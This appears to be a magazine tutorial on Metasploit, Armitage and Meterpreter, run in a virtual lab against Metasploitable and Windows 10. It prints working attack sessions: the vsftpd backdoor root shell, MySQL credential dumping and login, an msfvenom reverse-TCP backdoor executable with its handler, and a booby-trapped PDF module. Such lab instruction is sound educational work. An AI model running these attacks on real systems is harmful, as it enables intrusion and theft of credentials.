Security Tools

Armitage and Meterpreter

To get a quick taste of Metasploit's capabilities, just click on the Armitage entry in the main menu in Parrot or Kali Linux. Tutorials Point [7] and Offensive Security [8] offer good beginner tutorials for point-and-click forensics (as a friend who is a trainer for the German police force calls them).

Armitage enjoys a good reputation among red teams, thanks to its collaboration mode, which the developers themselves refer to as multiplayer Metasploit or red team collaboration mode. Armitage (Figure 5) can also perform simple Nmap host scans from its main menu, but the true strength of the tool only becomes apparent when several users work together on a compromised host in a Meterpreter shell.

Figure 5: Armitage is the GUI front end of choice for red teams and anyone looking for a graphical approach to Metasploit.

Meterpreter [9] is probably the most appealing payload an attacker can install on a remote computer. It can be easily hidden in other file formats (e.g., PDFs), sent as an email attachment, or embedded in websites. All it takes is for the victim to open a prepared website, email, or corresponding document, and the attacker gains control of the computer.

Meterpreter as a payload opens a reverse shell in this case – ransomware would now encrypt the computer and open a backdoor. A hijacked Windows 10 machine, for example, now gives the attacker access from the command line, perhaps even as the admin user. Long before PowerShell, the police trainer I referred to above cited Meterpreter as being the better shell for the Windows admin – not only because of the extensive command set, but also because of numerous helpful extensions like Mimikatz [10], which played a central role in the 2015 attack on the German Bundestag [11], helping to spy on the Active Directory domain and gain domain admin rights.

In the process, Meterpreter resides completely in the hijacked machine's RAM. Thanks to in-memory dynamic link library (DLL) injection, it does not write anything to the hard drive, does not create any new processes, and therefore ideally does not leave any permanent traces. Forensic experts call this a very small forensic footprint, but it can spill over into other running processes.

Meterpreter is extremely flexible, as well, which should come as no surprise, because it was designed to avoid the tricky decisions involved in choosing a suitable payload. Thanks to Meterpreter, you can do this later in the process from a remote shell without triggering alarms from virus scanners or similar tools.

From the command line, two basic methods are available: bind and reverse. With bind, Meterpreter listens locally on a port until the attacker connects. With reverse, the victim computer itself connects directly to the control server. The attacker must have configured it accordingly for the connection to work. Both approaches are useful in different scenarios.

All of the above can best be tested with Metasploitable. Version 2 of the image is now available with many additional security holes [12]. A complete list of all the vulnerabilities is beyond the scope of any article, but it is worth taking a look at the Exploitability Guide [13].

The image offered for download cannot be installed, because it is built for use in virtualized environments. It comes in the VMware VMDK format with separate configuration files. To use it in Libvirt/KVM, you have to download it from the Rapid7 website (this takes a bit of time because Rapid7 requires you to register) and then unpack and convert [14]. Running a script lets you edit the configuration file and create a new virtual machine with virsh in Libvirt. Although it sounds complicated, it can be done with just three commands:

$ qemu-img convert -f vmdk Metasploitable.vmdk -O qcow Metasploitable.qcow2
$ wget https://bazaar.launchpad.net/~ubuntu-virt/virt-goodies/trunk/download/head:/vmware2libvirt
$ python vmware2libvirt -f Metasploitable.vmx > Metasploitable.xml

The Ubuntu script worked without any problems on a laptop running openSUSE Tumbleweed in our lab. The command

zypper in virt-manager libvirtd

installs both the server service and the front end, but I was unable to convert the image with virt-v2v in the test; hence, the Ubuntu script in the wget command.

By default, the Metasploitable image uses the Libvirt default network, which is set to NAT, thus isolating the machines in the test scenario from the rest of the network. Don't forget: libvirtd only runs if systemd starts it, preferably permanently. The commands

systemctl enable libvirtd
systemctl status libvirtd
service libvirtd start

start libvirtd, check that it was successful, and ensure an immediate start. The next step is to import the image:

virsh -c qemu:///system define Metasploitable.xml

The virtual machine manager (virt-manager) will come up with a fully configured, bootable Metasploitable instance. It makes sense to ensure that the system automatically boots this instance and the associated network when booting or starting virt-manager.

Now install Windows 10 on another virtual machine and do the same for Kali Linux and Parrot Linux (although the two Live distributions also work wonderfully without the install). For performance reasons, I decided to install both distributions on virtual disks.

After completing this preliminary work, start the test with ssh-copy-id to transfer your own SSH key to the three Linux machines; an alias for each Linux makes life easier from now on. For Metasploitable, the username and password are msfadmin . Kali usually does not have a root account (if it does, the password is toor ; otherwise, you can configure it during the installation), but it does have a kali user with kali as the password. Parrot Linux also uses toor as the root password but largely disables the account.

The command

ssh-copy-id msfadmin@192.168.122.<nnn>

copies your public key to the virtual Metasploitable machine on IP address 192.168.122.nnn. Three aliases in ~/.alias make life easier (Listing 1), and don't forget to source after editing. Entries in the hostfile or in the DNS also help, as well.

alias metasploitable='ssh msfadmin@192.168.122.236'
alias kali='ssh kali@192.168.122.192'
alias parrot='ssh parrot@192.168.122.56'

At last, nothing stands in the way of an initial test of Metasploitable. Thanks to an intentional Telnet vulnerability, a backdoor opens up to the Parrot user (Listing 2). The example impressively shows the importance of signed software packages from reliable sources. Here, an attacker has obviously made sure that the FTP service on port 21 opens a backdoor with admin rights on port 6200 if – would you believe it? – the username of the vsftpd login contains a smiley (user mfeilner:)). Then the second telnet command in the example allows login-free access to a kind of root shell.

Parrot GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
Last login: Sun Jul 25 20:12:28 2021 from 192.168.122.1
[mfeilner@parrot][~]
$ telnet 192.168.122.236 21
Trying 192.168.122.236...
Connected to 192.168.122.236.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
user mfeilner:)
331 Please specify the password.
<pass>
^]
telnet> quit
Connection closed.
[mfeilner@parrot][~]
$ telnet 192.168.122.236 6200
Trying 192.168.122.236...
Connected to 192.168.122.236.
Escape character is '^]'.
id;
uid=0(root) gid=0(root)
cat /etc/passwd;
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
(...)
reboot;
Connection closed by foreign host.

Metasploitable runs many more insecure services that an Nmap scan brings to light (Listing 3), and because the nmap command also finds a MySQL database on Metasploitable, the next example shows how an attacker could easily hijack the database management system – thanks to a missing root password. Listing 4 shows the entire command sequence and the return output from Parrot, MSF, and Metasploitable. The msfconsole command launches the Metasploit framework's interactive shell. Listing 5 shows the verification by a MySQL command, including the retrieval of user data from /etc/passwd.

[root@parrot][/]
# nmap -p0-65535 metasploitable
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-25 22:05 CEST
Nmap scan report for metasploitable (192.168.122.236)
Host is up (0.095s latency).
Not shown: 65506 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  ircs-u
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  msgsrvr
45901/tcp open  unknown
46758/tcp open  unknown
58453/tcp open  unknown
60132/tcp open  unknown
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.35 seconds

[root@parrot][/]
# msfconsole
(...)
msf6 > use auxiliary/scanner/mysql/mysql_version
msf6 auxiliary(scanner/mysql/mysql_version) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_version) > run
[+] 192.168.122.236:3306  - 192.168.122.236:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] metasploitable:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_version) > use auxiliary/admin/mysql/mysql_enum
msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.122.236
[-] 192.168.122.236:3306 - Access denied
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf6 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.122.236
[*] 192.168.122.236:3306 - Running MySQL Enumerator...
[*] 192.168.122.236:3306 - Enumerating Parameters
[*] 192.168.122.236:3306 -      MySQL Version: 5.0.51a-3ubuntu5
(...)
[*] 192.168.122.236:3306 - Enumerating Accounts:
[*] 192.168.122.236:3306 -      List of Accounts with Password Hashes:
[+] 192.168.122.236:3306 -              User: debian-sys-maint Host:  Password Hash:
[+] 192.168.122.236:3306 -              User: root Host: % Password Hash:
[+] 192.168.122.236:3306 -              User: guest Host: % Password Hash:
[*] 192.168.122.236:3306
 -      The following users have GRANT Privilege:
[*] 192.168.122.236:3306 -              User: debian-sys-maint Host:
[*] 192.168.122.236:3306 -              User: root Host: %
[*] 192.168.122.236:3306 -              User: guest Host: %
[*] 192.168.122.236:3306 -      The following users have CREATE USER Privilege:
(...)
[*] Auxiliary module execution completed
msf6 auxiliary(admin/mysql/mysql_enum) > use auxiliary/scanner/mysql/mysql_hashdump
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_hashdump) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_hashdump) > run
[+] 192.168.122.236:3306  - Saving HashString as Loot: debian-sys-maint:
[+] 192.168.122.236:3306  - Saving HashString as Loot: root:
[+] 192.168.122.236:3306  - Saving HashString as Loot: guest:
[*] metasploitable:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 > use /auxiliary/scanner/mysql/mysql_login
[*] Using auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > use /auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf6 auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.122.236:3306  - No active DB -- Credential data will not be saved!
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Success: 'root:'
[*] metasploitable:3306   - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As you can see at the end of Listing 5, Metasploit does not yet use a database for the captured data here, so it does not leave any traces either. If you do use a database (PostgreSQL by default), you can draw on a few more helpful functions. The command

service postgresql start

(mfeilner@kali)-[~]
$ mysql -h metasploitable -u root
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 15
(...)
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.001 sec)
MySQL [(none)]> select load_file('/etc/passwd');
+----------------------------------------------(...)
+
| load_file('/etc/passwd')
(...)
+
| root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
(...)
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
(...)
+
1 row in set (0.001 sec)

starts PostgreSQL, so next you need to initialize it for Metasploit (Listing 6). The db_nmap command populates the database with hosts.

(root@kali)-[/home/mfeilner]
# msfdb init
[+] Starting database
[+] Creating database user 'msf'
Enter the password of the new role:
Enter it again:
[+] Creating databases 'msf'
(...)
[+] Creating databases 'msf_test'
(...)
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
(root@kali)-[/home/mfeilner]
msf6 > help database
Database Backend Commands
=========================
    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific
(...)
    db_nmap           Executes nmap and records the output
(...)
msf6 >  db_nmap -v -sV 192.168.122.0/24
(...)
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 66.64 seconds
msf6 > hosts
Hosts
=====
address          mac  name            os_name  os_flavor  os_sp  purpose  info  comments
-------          ---  ----            -------  ---------  -----  -------  ----  --------
192.168.122.1                         Unknown                    device
192.168.122.56        parrot          Unknown                    device
192.168.122.192       kali            Unknown                    device
192.168.122.236       metasploitable  Linux                      server

As Listing 7 shows, Metasploit now automatically runs the mysql-login scan against all listed hosts and also finds the vulnerable root account without a password. All other cases have dictionaries for a password attack on /usr/share/metasploit-framework/data/wordlists. You can apply them by typing:

SET PASS_FILE /<path/to/list>

msf6 > use /auxiliary/scanner/mysql/mysql_login
msf6 auxiliary(scanner/mysql/mysql_login) > run
[-] 192.168.122.1:3306    - 192.168.122.1:3306 - Unable to connect: The connection was refused by the remote host (192.168.122.1:3306).
[*] Scanned 1 of 5 hosts (20% complete)
(...)
[*] Scanned 4 of 5 hosts (80% complete)
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.122.236:3306  - 192.168.122.236:3306 - Success: 'root:'
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_login) > creds
Credentials
===========
host             origin           service           public  private  realm  private_type    JtR Format
----             ------           -------           ------  -------  -----
192.168.122.236  192.168.122.236  3306/tcp (mysql)  root                   Blank password

In Listing 7, creds shows all available, automatically acquired login data.

Even though the multistage Metasploit workflow is now clearer, the examples only outline the possibilities the framework offers. Even search login in the MSFconsole returns 248 exploits that could be used to log on to your systems. For example,

use auxiliary/scanner/smb/smb_login

helps you find out whether a Samba/Windows/Active Directory login also works for other services or servers.

If all of this is not enough, an attacker can use extensions like Autopwn (Listing 8) to make it even easier to hijack third-party machines in an automated process. The module was removed from Metasploit's standard scope in recent years.

# cd /usr/share/metasploit-framework/plugins
# sudo wget https://raw.githubusercontent.com/hahwul/metasploit-autopwn/master/db_autopwn.rb
# mfsconsole
msf6 > load db_autopwn
[*] Successfully loaded plugin: db_autopwn

Windows 10 and More

Metasploitable is not used in Listing 9, but it shows an attack on the Windows 10 instance. The latest versions of Microsoft's operating system already come with a considerable number of protection mechanisms; in this article, I avoid describing workarounds or sources for downloading the exploit.

(mfeilner@kali)-[~]
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.122.192 -f exe -o /tmp/backdoor.exe
(mfeilner@kali)-[~]
$ msfconsole
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.122.192
LHOST => 192.168.122.192
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.122.192:4444
[*] Sending stage (175174 bytes) to 192.168.122.43
[*] Meterpreter session 1 opened (192.168.122.192:4444 -> 192.168.122.43:57816) at 2021-07-26 01:49:31 +0200
meterpreter > execute -f cmd.exe -i -H
Process 6500 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.1110]
(c) Microsoft Corporation. All rights reserved.
C:\Users\mfeilner\Desktop>

In this example, msfvenom [15] creates an EXE file that contains a Meterpreter backdoor. With social hacking, the attacker can get the Windows user to throw all warnings (Figure 6) to the wind and execute the file. If this works, the attack can be configured and started with a few Metasploit commands. At the end of the day, the attacker has a remote administrator shell on Windows 10.

Figure 6: Without any obfuscation, the standard antivirus protection on Windows 10 already recognizes the Meterpreter payload as a Trojan, but this could easily be worked around.

This method also works with a PDF file, as Listing 10 shows. However, this requires an original file that you use to infect. In the example, simply viewing the PDF document on the victim's computer opens a remote shell for the attacker. They could now install a keylogger (e.g., keyscan_start); keyscan_dump returns the input.

(mfeilner@kali)-[~]
$ msfconsole
msf6 > use exploit/windows/fileformat/adobe_pdf_embedded_exe
(...)
msf6 > set EXENAME reverse.exe
(...)
msf6 > set FILENAME tibet.pdf
(...)
msf6 > set INFILENAME /tmp/test.pdf
(...)
msf6 > set OUTPUTPATH /tmp
(...)
msf6 > set PAYLOAD windows/meterpreter/bind_tcp

Another danger is when the attacker selects one process [16] and switches to another process used by the admin with migrate<PID>. The attacker can retrieve the PID with tools like ps (in the remote shell). The keylogger outputs the keystrokes fielded by the respective process – the winlogon.exe process is worth looking at, for example.

Windows 10 or PDF viewers are by no means the only targets: The news on the Meterpreter homepage turns out to be a real treasure trove for Apple hackers [17], and an Infosec [18] blog post describes how easy it is to hijack an Android device with an infected APK package. Again, this just involves five steps, thanks to Metasploit.

The Author

Markus Feilner, technology and network policy editor at Mailbox.org, has been working with Linux since 1994. He was deputy editor-in-chief of Linux-Magazin and iX, as well as the Docu Team Lead at Suse. For 21 years, he has managed Feilner IT, which specializes in documentation, digital sovereignty, and OSI layers 8 to 10.